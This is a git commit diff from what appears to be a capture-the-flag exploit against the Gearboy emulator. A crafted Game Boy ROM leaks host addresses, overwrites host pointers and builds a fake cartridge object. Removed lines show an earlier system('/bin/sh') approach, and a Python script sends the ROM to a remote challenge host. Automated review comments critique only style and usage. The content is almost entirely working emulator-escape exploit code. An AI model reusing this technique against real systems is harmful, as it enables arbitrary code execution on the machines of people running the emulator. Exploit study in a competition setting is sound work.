commit e3357dff0937f0d7f5c3bbf75bc479f566fee3d0
parent a1f7b8843f887d2d698477d6d8544e545a517725
Author: Louis Burda <quent.burda@gmail.com>
Date: Thu, 26 May 2022 20:41:58 +0200
Trolled by load instruction
Diffstat:
3 files changed, 38 insertions(+), 13 deletions(-)
diff --git a/Makefile b/Makefile
@@ -22,7 +22,7 @@ main.gb: main.c $(LCC)
$(LCC) -o $@ -Wall $< -Wl-yp0x143=0x80
$(GEARBOY):
- make -C ./gearboy/platforms/linux
+ DEBUG=1 make -C ./gearboy/platforms/linux
run: $(GEARBOY) main.gb
$(GEARBOY) main.gb
diff --git a/main.c b/main.c
@@ -4,8 +4,13 @@
void
main(void)
{
- volatile static uint8_t *processor;
- volatile static uint8_t *memory;
+ volatile static uint8_t *processor_gb;
+ volatile static uint8_t *memory_gb;
+ volatile static uint8_t *gbcore_gb;
+ volatile static uint8_t *cartridge_gb;
+ volatile static uint64_t memory;
+ volatile static uint64_t processor;
+ volatile static uint64_t cartridge;
volatile static uint64_t op0x00;
volatile static uint64_t base;
volatile static uint64_t libc;
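Review bot: `memory` and `processor` keep their names but change type from `uint8_t *` to `uint64_t`, while the new `*_gb` pointers take over the pointer role, so the declaration group now mixes two address kinds under near-identical names. A one-line comment on the group would make the split explicit, e.g. `/* *_gb: pointers into the emulated address space; plain uint64_t: values read out of it */`. main() continues outside the hunk.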
@@ -17,17 +22,35 @@ main(void)
/* processor - wrambanks = -0x126a0 */
/* WRAM BANK = -0x13 */
- processor = (void*) 0xD960;
+ processor_gb = (void*) 0xD960;
+ memory_gb = processor_gb - 0xd0;
+
+ /* leak base addr */
+ op0x00 = *(uint64_t*)processor_gb;
+ base = op0x00 - 0x1d420;
+ target = base + 0x13df0;
+
+ /* get real adresses */
+ processor = *(uint64_t*)memory_gb;
memory = processor - 0xd0;
- /* leak libc from addr */
- leak = *(uint64_t*)(memory + 0x30);
- libc = leak + 0x125cff0;
- target = libc + 0x52290; /* system */
+ *(uint64_t*)processor_gb = target;
+
+ /* setup fake cartridge opject behind processor & memory */
+ cartridge = processor - 0x960;
+ cartridge_gb = (void*) 0xD000; /* start of wram bank */
+ *(uint8_t*)(cartridge_gb+0x30) = 1; /* loaded */
+ *(uint8_t*)(cartridge_gb+0x40) = 1; /* battery */
+ strcpy((char*)(cartridge_gb+0x41), "/home/ctf/wrapper.py"); /* filepath */
+
+ /* setup fake gameboycore object */
+ gbcore_gb = processor_gb; /* at processor addr */
+ // *(uint64_t*)(gbcore_gb+0x00) = memory;
+ // *(uint64_t*)(gbcore_gb+0x08) = processor;
+ // *(uint64_t*)(gbcore_gb+0x28) = cartridge;
- /* set opcode 0x00 (nop) to gadget */
- strcpy(processor, "/bin/sh");
- *(uint64_t*)(processor+0x10*0x10) = target;
+ /* set opcode 0x10 (stop) to saveRam */
+ // *(uint64_t*)(processor+0x10*0x10) = target;
// *(uint64_t*)(processor+0x10*0x10) = 0;
__asm \
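Review bot: The commented-out stores (the three `gbcore_gb` writes and the `processor+0x10*0x10` write) leave the reader guessing which part of the setup is still live; either delete them or replace each with a comment stating why it is disabled, e.g. `/* disabled: see commit "Trolled by load instruction" */`. With those stores gone, `cartridge` (assigned from `processor - 0x960`) and `memory` (assigned from `processor - 0xd0`) are written but never read on the new side, which is worth a comment or removal. The heading `/* set opcode 0x10 (stop) to saveRam */` now introduces only commented-out code and the `__asm` that begins on the hunk's last line and continues outside it.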
diff --git a/solve.py b/solve.py
@@ -12,8 +12,10 @@ state = list(open("main.state", "rb").read())
for i,v in enumerate(struct.pack("<i", -0x13)):
state[0x10000+i] = v
-io = process("ncat --ssl 61a837693e76115bbb874401-gearboy.challenge.master.cscg.live 31337".split())
-#io = process("ncat localhost 1024".split())
+if len(argv) > 1:
+ io = process(argv[1:])
+else:
+ io = process("ncat localhost 1024".split())
io.sendline(b64encode(bytes(rom)))
io.sendline(b64encode(bytes(state)))
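Review bot: The new `argv[1:]` branch hands everything after the script name to `process()` as the command line, but nothing documents that contract; add a usage comment above the `if`, e.g. `# usage: solve.py [connect command ...]   (default: ncat localhost 1024)`. `argv` must already be imported above this hunk (`from sys import argv` or equivalent), which cannot be confirmed from here, so verify it. The script's top-level statements continue on both sides of the hunk.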